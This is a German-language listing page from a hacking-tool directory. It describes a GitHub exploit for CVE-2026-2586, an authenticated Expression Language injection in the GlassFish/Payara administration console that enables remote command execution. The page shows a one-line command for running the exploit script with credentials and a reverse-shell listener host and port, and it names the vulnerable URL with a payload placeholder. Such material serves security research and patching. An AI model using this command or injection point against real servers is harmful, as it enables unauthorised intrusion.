Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2586 — Authentifizierter EL-Injection-Exploit für die GlassFish/Payara-Administrationskonsole, der die Remote-Ausführung von Befehlen über manipulierte Parameter im Konfigurationsablauf des virtuellen Servers ermöglicht. | Kitploit
Tools/GitHubGitHub/deepsecurityresearch/cve-2026-2586
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdeepsecurityresearch/cve-2026-2586

CVE-2026-2586

Authentifizierter EL-Injection-Exploit für die GlassFish/Payara-Administrationskonsole, der die Remote-Ausführung von Befehlen über manipulierte Parameter im Konfigurationsablauf des virtuellen Servers ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Authentifizierte GlassFish EL Injection RCE (CVE-2026-2586)

Eine Expression Language Injection-Schwachstelle in der GlassFish Administration Console ermöglicht es einem authentifizierten Benutzer, bösartige EL-Ausdrücke in Parameter einzuschleusen, die von der administrativen Weboberfläche verarbeitet werden. Bei erfolgreicher Ausnutzung kann dies zur Fernausführung von Befehlen auf dem betroffenen Server führen.

Die Schwachstelle wurde im Bearbeitungsablauf für virtuelle Serverkonfigurationen identifiziert, bei dem vom Benutzer steuerbare Parameter von der Anwendung unsicher interpretiert werden.

Dies geschieht, weil:

  • Die administrative Oberfläche vom Benutzer gesteuerte Parameter innerhalb von EL-Ausdrücken verarbeitet.
  • Die Eingabe vor der Interpretation durch das Backend nicht ordnungsgemäß validiert oder neutralisiert wird.
  • Ein authentifizierter Benutzer in der Administrationskonsole das anfällige Verhalten ausnutzen kann, um Java-Klassen und -Methoden aufzurufen.
  • In einem erfolgreichen Ausnutzungsszenario ein Angreifer mit gültigen Anmeldeinformationen Befehle auf dem zugrunde liegenden Betriebssystem ausführen könnte.

Betroffene Komponente

  • Produkt: GlassFish / Payara Administration Console
  • CVE: CVE-2026-2586
  • Typ: Expression Language Injection
  • Auswirkung: Authentifizierte Remote-Codeausführung
  • Vektor: Administrative Weboberfläche

Proof of Concept

Der Test wurde in einer lokalen und kontrollierten Umgebung durchgeführt.

root@kitploit:~
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure

Verwundbare URL:

https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true

Rechtliches

NUR FÜR AUTORISIERTE VERWENDUNG. DeepSecurity Perú befürwortet keinen unbefugten Zugriff und übernimmt keine Verantwortung für jeglichen Missbrauch der bereitgestellten Informationen.

Tool herunterladen